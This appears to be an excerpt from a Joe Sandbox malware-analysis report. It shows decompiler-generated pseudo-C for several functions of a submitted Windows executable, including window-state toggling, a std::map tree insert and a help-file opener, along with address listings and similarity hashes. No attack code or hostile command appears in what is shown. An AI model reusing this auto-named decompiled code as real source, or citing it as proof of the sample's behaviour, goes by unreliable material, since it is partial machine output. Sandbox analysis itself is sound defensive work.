				E00401D80(0, _t152 + 0x2c, _t152 + 0x44, _t75 - _t127 >> 1);
				_t117 =  *((intOrPtr*)(_t152 + 0x3c));
				_t129 =  *((intOrPtr*)(_t152 + 0x28));
				 *((intOrPtr*)(_t152 + 0x24c)) = 0;
				 *((intOrPtr*)(_t152 + 0x1c)) = 0x20;
				_t79 = _t129;
				if(_t117 < 8) {
					_t79 = _t152 + 0x28;
				}
				_t147 =  *(_t152 + 0x38);
				_t134 = _t79 + _t147 * 2;
				if(_t134 == 0) {
					L14:
					E0041AD33();
					_t117 =  *((intOrPtr*)(_t152 + 0x3c));
					_t147 =  *(_t152 + 0x38);
					_t129 =  *((intOrPtr*)(_t152 + 0x28));
				} else {
					_t104 = _t129;
					if(_t117 < 8) {
						_t104 = _t152 + 0x28;
					}
					if(_t104 > _t134) {
						goto L14;
					} else {
						_t105 = _t129;
						if(_t117 < 8) {
							_t105 = _t152 + 0x28;
						}
						if(_t134 > _t105 + _t147 * 2) {
							goto L14;
						}
					}
				}
				_t109 = _t152 + 0x24;
				if(_t117 < 8) {
					_t140 = _t152 + 0x28;
					goto L17;
				} else {
					_t140 = _t129;
					if(_t129 == 0) {
						L23:
						E0041AD33();
					} else {
						L17:
						_t81 = _t129;
						if(_t117 < 8) {
							_t81 = _t152 + 0x28;
						}
						if(_t81 > _t140) {
							goto L23;
						} else {
							_t103 = _t129;
							if(_t117 < 8) {
								_t103 = _t152 + 0x28;
							}
							if(_t140 > _t103 + _t147 * 2) {
								goto L23;
							}
						}
					}
				}
				E004083A0(_t152 + 0x28, _t152 + 0x30, _t140, _t109, _t134, _t152 + 0x1c);
				_t118 =  *((intOrPtr*)(_t152 + 0x54));
				_t135 =  *((intOrPtr*)(_t152 + 0x40));
				_t153 = _t152 + 0x18;
				_t86 = _t135;
				if(_t118 < 8) {
					_t86 = _t153 + 0x28;
				}
				_t131 =  *(_t153 + 0x38);
				_t141 = _t86 + _t131 * 2;
				if(_t141 == 0) {
					L33:
					E0041AD33();
				} else {
					_t101 = _t135;
					if(_t118 < 8) {
						_t101 = _t153 + 0x28;
					}
					if(_t101 > _t141) {
						goto L33;
					} else {
						_t102 = _t135;
						if(_t118 < 8) {
							_t102 = _t153 + 0x28;
						}
						if(_t141 > _t102 + _t131 * 2) {
							goto L33;
						}
					}
				}
				_t132 =  *((intOrPtr*)(_t153 + 0x18));
				E004081D0(_t153 + 0x38, _t147, _t153 + 0x24,  *((intOrPtr*)(_t153 + 0x1c)),  *((intOrPtr*)(_t153 + 0x18)), _t153 + 0x28, _t141);
				_t148 =  *((intOrPtr*)(_t153 + 0x20));
				_t142 =  *((intOrPtr*)(_t148 + 0x800));
				_t110 = _t109 & 0xffffff00 |  *(_t153 + 0x38) != 0x00000000;
				_t92 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t92 == 0) {
					_t136 = 0;
					__eflags = 0;
				} else {
					_t100 =  *_t92(_t142, 1);
					_t153 = _t153 + 8;
					_t136 = _t100;
				}
				_t143 =  *((intOrPtr*)(_t148 + 0x800));
				_t94 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t94 == 0) {
					_t149 = 0;
					__eflags = 0;
				} else {
					_t99 =  *_t94(_t143, 0x3f8);
					_t153 = _t153 + 8;
					_t149 = _t99;
				}
				_t144 = _t110 & 0x000000ff;
				_t111 = IsWindowEnabled;
				if(_t144 != IsWindowEnabled(_t136)) {
					 *0x43baa4(_t136, _t144);
				}
				if(_t144 != IsWindowEnabled(_t149)) {
					_t96 =  *0x43baa4(_t149, _t144);
				}
				_t181 =  *((intOrPtr*)(_t153 + 0x3c)) - 8;
				if( *((intOrPtr*)(_t153 + 0x3c)) >= 8) {
					_t132 =  *((intOrPtr*)(_t153 + 0x28));
					_push( *((intOrPtr*)(_t153 + 0x28)));
					_t96 = L0041A97D(_t111, _t136, _t144, _t181);
					_t153 = _t153 + 4;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t153 + 0x244));
				_pop(_t137);
				_pop(_t145);
				_pop(_t112);
				return E0041B3F9(_t96, _t112,  *(_t153 + 0x22c) ^ _t153, _t132, _t137, _t145);
			}


















































                                                                                                                              0x0040dab0
                                                                                                                              0x0040dab2
                                                                                                                              0x0040dabd
                                                                                                                              0x0040dabe
                                                                                                                              0x0040dac4
                                                                                                                              0x0040dacb
                                                                                                                              0x0040dad6
                                                                                                                              0x0040dadd
                                                                                                                              0x0040dae5
                                                                                                                              0x0040daeb
                                                                                                                              0x0040daf1
                                                                                                                              0x0040dafa
                                                                                                                              0x0040db01
                                                                                                                              0x0040db10
                                                                                                                              0x0040db10
                                                                                                                              0x0040db03
                                                                                                                              0x0040db09
                                                                                                                              0x0040db0b
                                                                                                                              0x0040db0b
                                                                                                                              0x0040db1d
                                                                                                                              0x0040db23
                                                                                                                              0x0040db27
                                                                                                                              0x0040db2f
                                                                                                                              0x0040db33
                                                                                                                              0x0040db38
                                                                                                                              0x0040db40
                                                                                                                              0x0040db40
                                                                                                                              0x0040db43
                                                                                                                              0x0040db46
                                                                                                                              0x0040db59
                                                                                                                              0x0040db5e
                                                                                                                              0x0040db65
                                                                                                                              0x0040db69
                                                                                                                              0x0040db70
                                                                                                                              0x0040db78
                                                                                                                              0x0040db7a
                                                                                                                              0x0040db7c
                                                                                                                              0x0040db7c
                                                                                                                              0x0040db80
                                                                                                                              0x0040db84
                                                                                                                              0x0040db89
                                                                                                                              0x0040dbac
                                                                                                                              0x0040dbac
                                                                                                                              0x0040dbb1
                                                                                                                              0x0040dbb5
                                                                                                                              0x0040dbb9
                                                                                                                              0x0040db8b
                                                                                                                              0x0040db8e
                                                                                                                              0x0040db90
                                                                                                                              0x0040db92
                                                                                                                              0x0040db92
                                                                                                                              0x0040db98
                                                                                                                              0x00000000
                                                                                                                              0x0040db9a
                                                                                                                              0x0040db9d
                                                                                                                              0x0040db9f
                                                                                                                              0x0040dba1
                                                                                                                              0x0040dba1
                                                                                                                              0x0040dbaa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040dbaa
                                                                                                                              0x0040db98
                                                                                                                              0x0040dbc0
                                                                                                                              0x0040dbc4
                                                                                                                              0x0040dc9c
                                                                                                                              0x00000000
                                                                                                                              0x0040dbca
                                                                                                                              0x0040dbcc
                                                                                                                              0x0040dbce
                                                                                                                              0x0040dbf1
                                                                                                                              0x0040dbf1
                                                                                                                              0x0040dbd0
                                                                                                                              0x0040dbd0
                                                                                                                              0x0040dbd3
                                                                                                                              0x0040dbd5
                                                                                                                              0x0040dbd7
                                                                                                                              0x0040dbd7
                                                                                                                              0x0040dbdd
                                                                                                                              0x00000000
                                                                                                                              0x0040dbdf
                                                                                                                              0x0040dbe2
                                                                                                                              0x0040dbe4
                                                                                                                              0x0040dbe6
                                                                                                                              0x0040dbe6
                                                                                                                              0x0040dbef
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040dbef
                                                                                                                              0x0040dbdd
                                                                                                                              0x0040dbce
                                                                                                                              0x0040dc08
                                                                                                                              0x0040dc0d
                                                                                                                              0x0040dc11
                                                                                                                              0x0040dc15
                                                                                                                              0x0040dc1b
                                                                                                                              0x0040dc1d
                                                                                                                              0x0040dc1f
                                                                                                                              0x0040dc1f
                                                                                                                              0x0040dc23
                                                                                                                              0x0040dc27
                                                                                                                              0x0040dc2c
                                                                                                                              0x0040dc4f
                                                                                                                              0x0040dc4f
                                                                                                                              0x0040dc2e
                                                                                                                              0x0040dc31
                                                                                                                              0x0040dc33
                                                                                                                              0x0040dc35
                                                                                                                              0x0040dc35
                                                                                                                              0x0040dc3b
                                                                                                                              0x00000000
                                                                                                                              0x0040dc3d
                                                                                                                              0x0040dc40
                                                                                                                              0x0040dc42
                                                                                                                              0x0040dc44
                                                                                                                              0x0040dc44
                                                                                                                              0x0040dc4d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040dc4d
                                                                                                                              0x0040dc3b
                                                                                                                              0x0040dc54
                                                                                                                              0x0040dc6d
                                                                                                                              0x0040dc77
                                                                                                                              0x0040dc7b
                                                                                                                              0x0040dc81
                                                                                                                              0x0040dc89
                                                                                                                              0x0040dc8e
                                                                                                                              0x0040dca5
                                                                                                                              0x0040dca5
                                                                                                                              0x0040dc90
                                                                                                                              0x0040dc93
                                                                                                                              0x0040dc95
                                                                                                                              0x0040dc98
                                                                                                                              0x0040dc98
                                                                                                                              0x0040dca7
                                                                                                                              0x0040dcb2
                                                                                                                              0x0040dcb7
                                                                                                                              0x0040dcc8
                                                                                                                              0x0040dcc8
                                                                                                                              0x0040dcb9
                                                                                                                              0x0040dcbf
                                                                                                                              0x0040dcc1
                                                                                                                              0x0040dcc4
                                                                                                                              0x0040dcc4
                                                                                                                              0x0040dcca
                                                                                                                              0x0040dccd
                                                                                                                              0x0040dcd8
                                                                                                                              0x0040dcdc
                                                                                                                              0x0040dcdc
                                                                                                                              0x0040dce7
                                                                                                                              0x0040dceb
                                                                                                                              0x0040dceb
                                                                                                                              0x0040dcf1
                                                                                                                              0x0040dcf6
                                                                                                                              0x0040dcf8
                                                                                                                              0x0040dcfc
                                                                                                                              0x0040dcfd
                                                                                                                              0x0040dd02
                                                                                                                              0x0040dd02
                                                                                                                              0x0040dd0c
                                                                                                                              0x0040dd14
                                                                                                                              0x0040dd15
                                                                                                                              0x0040dd17
                                                                                                                              0x0040dd2c

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 1846f4f3212a80c40872b78cd317f3e069fc69ee1ce7f706448773735d97f698
                                                                                                                              • Instruction ID: 142890dbae3506172c9a720ee6d0cb579b6634b4a7123a10a74eecac26c59c60
                                                                                                                              • Opcode Fuzzy Hash: 1846f4f3212a80c40872b78cd317f3e069fc69ee1ce7f706448773735d97f698
                                                                                                                              • Instruction Fuzzy Hash: 5B71D5319082019FC714EB54C880AAFB7F5EFC4354F55093EF546A7290EB78EA49CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00410900 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 70%
                                                                                                                              			E00410900() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				signed int _t51;
				char _t53;
				void* _t57;
				intOrPtr _t58;
				signed int _t66;
				void* _t69;
				signed int _t79;
				intOrPtr _t91;
				intOrPtr* _t96;
				signed short* _t112;
				intOrPtr _t119;
				signed int* _t128;
				void* _t133;
				intOrPtr _t134;
				void* _t135;
				intOrPtr* _t137;
				intOrPtr _t138;
				signed int _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t145;
				void* _t146;
				intOrPtr _t150;

				_t139 = _t141 - 0x620;
				_push(0xffffffff);
				_push(E00430A30);
				_push( *[fs:0x0]);
				_t143 = _t141 - 0x5f4;
				_t50 =  *0x43a6a8; // 0x2a5cd135
				_t51 = _t50 ^ _t139;
				 *(_t139 + 0x61c) = _t51;
				_push(_t133);
				_push(_t51);
				 *[fs:0x0] = _t139 - 0xc;
				 *((intOrPtr*)(_t139 - 0x10)) = _t143;
				_t137 =  *((intOrPtr*)(_t139 + 0x628));
				 *((intOrPtr*)(_t139 - 0x18)) = _t137;
				if(_t137 == 0 ||  *_t137 == 0) {
					_t53 = 1;
					goto L15;
				} else {
					 *((intOrPtr*)(_t139 - 4)) = 0;
					 *((short*)(_t139 + 0x41c)) = 0;
					E0041B880(_t133, _t139 + 0x41e, 0, 0x1fe);
					_t145 = _t143 + 0xc;
					 *((intOrPtr*)(_t139 - 0x14)) = 0;
					_t57 = E00404510();
					_t96 =  *((intOrPtr*)(_t57 + 8));
					if(_t96 != 0) {
						 *_t96( *((intOrPtr*)(_t57 + 0xbc)), 0x89, _t139 + 0x21c, 0x100);
						_t145 = _t145 + 0x10;
					}
					_t58 =  *((intOrPtr*)(_t137 + 4));
					if(_t58 != 0xffffffff) {
						__eflags = _t58 - 0xfffffffe;
						if(__eflags != 0) {
							_push(_t58);
							E0040FA20(_t139, __eflags,  *((intOrPtr*)( *_t137 + 4)), _t139 + 0x21c, 3);
							_t146 = _t145 + 0x10;
							_t135 = E00401370( *((intOrPtr*)( *_t137 + 0xc)),  *_t137, _t139, __eflags,  *((intOrPtr*)(_t137 + 8)));
							__eflags = _t135 - 2;
							if(_t135 == 2) {
								_t66 = E00407B80(E00404510(),  *((intOrPtr*)( *_t137 + 4)), 0x8c, 0x7a, 0x4000, 0x10000, 0xffffffff, 0, 0, 0);
								__eflags = (_t66 & 0x00000009) - 9;
								if((_t66 & 0x00000009) == 9) {
									_push("\\");
									__eflags =  *((intOrPtr*)( *_t137 + 0xc)) + 4;
									_t69 = E00408450(0, _t139 - 0x38, _t139, _t139 - 0x38);
									 *((char*)(_t139 - 4)) = 1;
									E00408450(0, _t139 - 0x38, _t139, _t139);
									 *((char*)(_t139 - 4)) = 3;
									E00404600(_t139 - 0x38);
									_t150 = _t146 + 0x18 - 0x1c;
									 *((intOrPtr*)(_t139 - 0x1c)) = _t150;
									E00401E60(_t150, _t139);
									E00418E00(_t139, _t139,  *((intOrPtr*)( *_t137 + 4)), L"help\\conv_viewing_status_and_information.html", _t69, L"hnv",  *((intOrPtr*)( *_t137 + 0xc)) + 4);
									_t146 = _t150 + 0x24;
									 *((char*)(_t139 - 4)) = 0;
									E00404600(_t139);
								}
							}
							E0040F570(_t135, _t139 + 0x41c, _t139 - 0x14);
							_push( *((intOrPtr*)(_t137 + 4)));
							_t120 =  *((intOrPtr*)( *_t137 + 4));
							_t53 = E0040FA20(_t139, __eflags,  *((intOrPtr*)( *_t137 + 4)), _t139 + 0x41c,  *((intOrPtr*)(_t139 - 0x14)));
							goto L15;
						}
						_t112 = E004012C0( *((intOrPtr*)( *_t137 + 0xc)));
						_t128 = _t139 + 0x1c;
						do {
							_t79 =  *_t112 & 0x0000ffff;
							 *_t128 = _t79;
							_t112 =  &(_t112[1]);
							_t128 =  &(_t128[0]);
							__eflags = _t79;
						} while (__eflags != 0);
						_push(3);
						E0040F830(_t139, __eflags,  *((intOrPtr*)( *_t137 + 4)), _t139 + 0x1c, _t139 + 0x21c);
						E0040F570(E00401370( *((intOrPtr*)( *_t137 + 0xc)), _t139 + 0x1c, _t139, __eflags, _t139 + 0x1c), _t139 + 0x41c, _t139 - 0x14);
						_t120 =  *_t137;
						_push(0);
						_t53 = E0040FA20(_t139, __eflags,  *((intOrPtr*)( *_t137 + 4)), _t139 + 0x41c,  *((intOrPtr*)(_t139 - 0x14)));
						goto L15;
					} else {
						_t119 =  *_t137;
						_t120 =  *((intOrPtr*)(_t119 + 0xc));
						_push(E0040FC30);
						_push( *((intOrPtr*)(_t119 + 0xc)));
						_t53 = E00402FB0();
						L15:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						_pop(_t134);
						_pop(_t138);
						_pop(_t91);
						return E0041B3F9(_t53, _t91,  *(_t139 + 0x61c) ^ _t139, _t120, _t134, _t138);
					}
				}
			}































                                                                                                                              0x00410901
                                                                                                                              0x0041090e
                                                                                                                              0x00410910
                                                                                                                              0x0041091b
                                                                                                                              0x0041091c
                                                                                                                              0x0041091f
                                                                                                                              0x00410924
                                                                                                                              0x00410926
                                                                                                                              0x0041092e
                                                                                                                              0x0041092f
                                                                                                                              0x00410933
                                                                                                                              0x00410939
                                                                                                                              0x0041093c
                                                                                                                              0x00410946
                                                                                                                              0x00410949
                                                                                                                              0x00410b77
                                                                                                                              0x00000000
                                                                                                                              0x00410957
                                                                                                                              0x00410964
                                                                                                                              0x00410967
                                                                                                                              0x0041096e
                                                                                                                              0x00410973
                                                                                                                              0x00410976
                                                                                                                              0x00410979
                                                                                                                              0x0041097e
                                                                                                                              0x00410983
                                                                                                                              0x0041099d
                                                                                                                              0x0041099f
                                                                                                                              0x0041099f
                                                                                                                              0x004109a2
                                                                                                                              0x004109a8
                                                                                                                              0x004109bf
                                                                                                                              0x004109c2
                                                                                                                              0x00410a45
                                                                                                                              0x00410a53
                                                                                                                              0x00410a5d
                                                                                                                              0x00410a69
                                                                                                                              0x00410a6b
                                                                                                                              0x00410a6e
                                                                                                                              0x00410a97
                                                                                                                              0x00410a9f
                                                                                                                              0x00410aa1
                                                                                                                              0x00410aa8
                                                                                                                              0x00410aad
                                                                                                                              0x00410ab5
                                                                                                                              0x00410ac7
                                                                                                                              0x00410acb
                                                                                                                              0x00410ad6
                                                                                                                              0x00410ada
                                                                                                                              0x00410ae4
                                                                                                                              0x00410aec
                                                                                                                              0x00410af0
                                                                                                                              0x00410afb
                                                                                                                              0x00410b00
                                                                                                                              0x00410b06
                                                                                                                              0x00410b09
                                                                                                                              0x00410b09
                                                                                                                              0x00410aa1
                                                                                                                              0x00410b1c
                                                                                                                              0x00410b27
                                                                                                                              0x00410b2b
                                                                                                                              0x00410b36
                                                                                                                              0x00000000
                                                                                                                              0x00410b3b
                                                                                                                              0x004109d2
                                                                                                                              0x004109d4
                                                                                                                              0x004109d7
                                                                                                                              0x004109d7
                                                                                                                              0x004109da
                                                                                                                              0x004109dd
                                                                                                                              0x004109e0
                                                                                                                              0x004109e3
                                                                                                                              0x004109e3
                                                                                                                              0x004109ea
                                                                                                                              0x004109fb
                                                                                                                              0x00410a1f
                                                                                                                              0x00410a27
                                                                                                                              0x00410a29
                                                                                                                              0x00410a36
                                                                                                                              0x00000000
                                                                                                                              0x004109aa
                                                                                                                              0x004109aa
                                                                                                                              0x004109ac
                                                                                                                              0x004109af
                                                                                                                              0x004109b4
                                                                                                                              0x004109b5
                                                                                                                              0x00410b7c
                                                                                                                              0x00410b7f
                                                                                                                              0x00410b87
                                                                                                                              0x00410b88
                                                                                                                              0x00410b89
                                                                                                                              0x00410ba0
                                                                                                                              0x00410ba0
                                                                                                                              0x004109a8

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • hnv, xrefs: 00410ABD
                                                                                                                              • help\conv_viewing_status_and_information.html, xrefs: 00410ADF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: help\conv_viewing_status_and_information.html$hnv
                                                                                                                              • API String ID: 2102423945-3275761440
                                                                                                                              • Opcode ID: bb5ce44d0ca6cd318f9dca95b59094c0a731a4d7cdf9331e3188e9bd8c349481
                                                                                                                              • Instruction ID: 77cbb6b08476c0120d3b4a8df381a4615fd6fee82019c4eee52163878da646b4
                                                                                                                              • Opcode Fuzzy Hash: bb5ce44d0ca6cd318f9dca95b59094c0a731a4d7cdf9331e3188e9bd8c349481
                                                                                                                              • Instruction Fuzzy Hash: B571E9B5600208AFD724EF54CC91EEBB3B9EF88314F10852EF549572C1D778AA45CB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405850 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E00405850(intOrPtr __ecx, void* __edx) {
				signed int _t82;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr _t94;
				intOrPtr* _t100;
				intOrPtr* _t112;
				intOrPtr* _t114;
				void* _t126;
				intOrPtr* _t130;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr* _t137;
				intOrPtr _t140;
				intOrPtr _t145;
				intOrPtr* _t148;
				intOrPtr _t149;
				intOrPtr _t153;
				void* _t155;
				signed int _t156;

				_t126 = __edx;
				_t109 = __ecx;
				_push(0xffffffff);
				_push(E0042FFC8);
				_push( *[fs:0x0]);
				_t156 = _t155 - 0x44;
				_t82 =  *0x43a6a8; // 0x2a5cd135
				_push(_t82 ^ _t156);
				 *[fs:0x0] = _t156 + 0x58;
				_t145 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) >= 0x71c71c6) {
					 *((intOrPtr*)(_t156 + 0x34)) = 0xf;
					 *((intOrPtr*)(_t156 + 0x30)) = 0;
					 *((char*)(_t156 + 0x20)) = 0;
					E00401A00(_t156 + 0x1c, "map/set<T> too long", 0x13);
					 *((intOrPtr*)(_t156 + 0x64)) = 0;
					E00401EC0(_t126, 0, _t156 + 0x14);
					_t109 = _t156 + 0x34;
					 *((intOrPtr*)(_t156 + 0x38)) = 0x432354;
					E0041ADC6(_t156 + 0x34, 0x437064);
				}
				_t148 =  *((intOrPtr*)(_t156 + 0x70));
				_t153 = E004050F0(_t109,  *((intOrPtr*)(_t145 + 4)), _t148,  *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t156 + 0x74)), 0);
				_t87 =  *((intOrPtr*)(_t145 + 4));
				 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;
				if(_t148 != _t87) {
					__eflags =  *((char*)(_t156 + 0x6c));
					if( *((char*)(_t156 + 0x6c)) == 0) {
						 *((intOrPtr*)(_t148 + 8)) = _t153;
						_t88 =  *((intOrPtr*)(_t145 + 4));
						__eflags = _t148 -  *((intOrPtr*)(_t88 + 8));
						if(_t148 ==  *((intOrPtr*)(_t88 + 8))) {
							 *((intOrPtr*)(_t88 + 8)) = _t153;
						}
					} else {
						 *_t148 = _t153;
						_t100 =  *((intOrPtr*)(_t145 + 4));
						__eflags = _t148 -  *_t100;
						if(_t148 ==  *_t100) {
							 *_t100 = _t153;
						}
					}
				} else {
					 *((intOrPtr*)(_t87 + 4)) = _t153;
					 *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)))) = _t153;
					 *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)) + 8)) = _t153;
				}
				_t30 = _t153 + 4; // 0x4
				_t89 = _t30;
				_t149 = _t153;
				if( *((char*)( *((intOrPtr*)(_t153 + 4)) + 0x30)) != 0) {
					L30:
					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t145 + 4)) + 4)) + 0x30)) = 1;
					_t91 =  *((intOrPtr*)(_t156 + 0x68));
					 *((intOrPtr*)(_t91 + 4)) = _t153;
					 *_t91 = _t145;
					 *[fs:0x0] =  *((intOrPtr*)(_t156 + 0x58));
					return _t91;
				}
				do {
					_t112 =  *_t89;
					_t130 =  *((intOrPtr*)(_t112 + 4));
					if(_t112 !=  *_t130) {
						_t131 =  *_t130;
						__eflags =  *((char*)(_t131 + 0x30));
						if( *((char*)(_t131 + 0x30)) != 0) {
							__eflags = _t149 -  *_t112;
							if(_t149 ==  *_t112) {
								_t149 = _t112;
								E004042C0(_t145, _t149);
							}
							 *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x30)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)) + 0x30)) = 0;
							_t94 =  *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4));
							_t114 =  *((intOrPtr*)(_t94 + 8));
							 *((intOrPtr*)(_t94 + 8)) =  *_t114;
							_t134 =  *_t114;
							__eflags =  *((char*)(_t134 + 0x31));
							if( *((char*)(_t134 + 0x31)) == 0) {
								 *((intOrPtr*)(_t134 + 4)) = _t94;
							}
							 *((intOrPtr*)(_t114 + 4)) =  *((intOrPtr*)(_t94 + 4));
							_t136 =  *((intOrPtr*)(_t145 + 4));
							__eflags = _t94 -  *((intOrPtr*)(_t136 + 4));
							if(_t94 !=  *((intOrPtr*)(_t136 + 4))) {
								_t137 =  *((intOrPtr*)(_t94 + 4));
								__eflags = _t94 -  *_t137;
								if(_t94 !=  *_t137) {
									 *((intOrPtr*)(_t137 + 8)) = _t114;
								} else {
									 *_t137 = _t114;
								}
							} else {
								 *((intOrPtr*)(_t136 + 4)) = _t114;
							}
							 *_t114 = _t94;
							 *((intOrPtr*)(_t94 + 4)) = _t114;
						} else {
							 *((char*)(_t112 + 0x30)) = 1;
							 *((char*)(_t131 + 0x30)) = 1;
							 *((char*)( *((intOrPtr*)( *_t89 + 4)) + 0x30)) = 0;
							_t149 =  *((intOrPtr*)( *_t89 + 4));
						}
					} else {
						_t140 =  *((intOrPtr*)(_t130 + 8));
						if( *((char*)(_t140 + 0x30)) != 0) {
							__eflags = _t149 -  *((intOrPtr*)(_t112 + 8));
							if(_t149 ==  *((intOrPtr*)(_t112 + 8))) {
								_t149 = _t112;
								E00404270(_t145, _t149);
							}
							 *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x30)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)) + 0x30)) = 0;
							E004042C0(_t145,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 4)) + 4)));
						} else {
							 *((char*)(_t112 + 0x30)) = 1;
							 *((char*)(_t140 + 0x30)) = 1;
							 *((char*)( *((intOrPtr*)( *_t89 + 4)) + 0x30)) = 0;
							_t149 =  *((intOrPtr*)( *_t89 + 4));
						}
					}
					_t74 = _t149 + 4; // 0x4
					_t89 = _t74;
				} while ( *((char*)( *((intOrPtr*)(_t149 + 4)) + 0x30)) == 0);
				goto L30;
			}

























                                                                                                                              0x00405850
                                                                                                                              0x00405850
                                                                                                                              0x00405850
                                                                                                                              0x00405852
                                                                                                                              0x0040585d
                                                                                                                              0x0040585e
                                                                                                                              0x00405865
                                                                                                                              0x0040586c
                                                                                                                              0x00405871
                                                                                                                              0x00405877
                                                                                                                              0x00405880
                                                                                                                              0x0040588f
                                                                                                                              0x00405897
                                                                                                                              0x0040589b
                                                                                                                              0x004058a0
                                                                                                                              0x004058ae
                                                                                                                              0x004058b2
                                                                                                                              0x004058bc
                                                                                                                              0x004058c1
                                                                                                                              0x004058c9
                                                                                                                              0x004058c9
                                                                                                                              0x004058d5
                                                                                                                              0x004058e4
                                                                                                                              0x004058e6
                                                                                                                              0x004058ee
                                                                                                                              0x004058f3
                                                                                                                              0x00405905
                                                                                                                              0x0040590a
                                                                                                                              0x00405919
                                                                                                                              0x0040591c
                                                                                                                              0x0040591f
                                                                                                                              0x00405922
                                                                                                                              0x00405924
                                                                                                                              0x00405924
                                                                                                                              0x0040590c
                                                                                                                              0x0040590c
                                                                                                                              0x0040590e
                                                                                                                              0x00405911
                                                                                                                              0x00405913
                                                                                                                              0x00405915
                                                                                                                              0x00405915
                                                                                                                              0x00405913
                                                                                                                              0x004058f5
                                                                                                                              0x004058f5
                                                                                                                              0x004058fb
                                                                                                                              0x00405900
                                                                                                                              0x00405900
                                                                                                                              0x0040592e
                                                                                                                              0x0040592e
                                                                                                                              0x00405931
                                                                                                                              0x00405933
                                                                                                                              0x00405a25
                                                                                                                              0x00405a2b
                                                                                                                              0x00405a2e
                                                                                                                              0x00405a32
                                                                                                                              0x00405a35
                                                                                                                              0x00405a3b
                                                                                                                              0x00405a4a
                                                                                                                              0x00405a4a
                                                                                                                              0x00405940
                                                                                                                              0x00405940
                                                                                                                              0x00405942
                                                                                                                              0x00405947
                                                                                                                              0x0040599a
                                                                                                                              0x0040599c
                                                                                                                              0x004059a0
                                                                                                                              0x004059b8
                                                                                                                              0x004059ba
                                                                                                                              0x004059bc
                                                                                                                              0x004059c1
                                                                                                                              0x004059c1
                                                                                                                              0x004059c9
                                                                                                                              0x004059d2
                                                                                                                              0x004059d9
                                                                                                                              0x004059dc
                                                                                                                              0x004059e1
                                                                                                                              0x004059e4
                                                                                                                              0x004059e6
                                                                                                                              0x004059ea
                                                                                                                              0x004059ec
                                                                                                                              0x004059ec
                                                                                                                              0x004059f2
                                                                                                                              0x004059f5
                                                                                                                              0x004059f8
                                                                                                                              0x004059fb
                                                                                                                              0x00405a02
                                                                                                                              0x00405a05
                                                                                                                              0x00405a07
                                                                                                                              0x00405a0d
                                                                                                                              0x00405a09
                                                                                                                              0x00405a09
                                                                                                                              0x00405a09
                                                                                                                              0x004059fd
                                                                                                                              0x004059fd
                                                                                                                              0x004059fd
                                                                                                                              0x00405a10
                                                                                                                              0x00405a12
                                                                                                                              0x004059a2
                                                                                                                              0x004059a2
                                                                                                                              0x004059a5
                                                                                                                              0x004059ad
                                                                                                                              0x004059b3
                                                                                                                              0x004059b3
